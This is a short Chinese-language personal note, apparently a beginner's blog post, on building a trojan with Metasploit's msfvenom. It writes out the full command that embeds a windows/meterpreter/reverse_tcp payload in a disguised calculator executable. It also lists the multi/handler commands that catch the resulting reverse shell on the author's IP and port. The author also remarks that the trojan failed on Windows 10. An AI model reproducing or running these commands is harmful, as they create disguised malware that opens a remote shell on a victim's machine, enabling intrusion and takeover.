看的是15年的老电影了(教程)
msfpayload 15年就被丢弃了,搞了才发现被集成到msfvenom里了。
生成木马:
#参数 -p [指定攻击载荷名称]
#参数 -f [指定payload的输出格式]
#参数 -x 指定捆绑到哪个文件上
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[myIP] LPORT=[myPORT] -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe
win10不能执行,待今晚装完win7测试回来修改结果。
#执行handler模块
use exploit/multi/handler
#装载攻击载荷添加反向tcp链接
set PAYLOAD windows/meterpreter/reverse_tcp
#反弹会话IP
set LHOST [myIP]
#反弹会话端口
set LPORT [myPORT]
#执行exploit
事实表明是模块没用好。嘻嘻新手踩大坑了-。-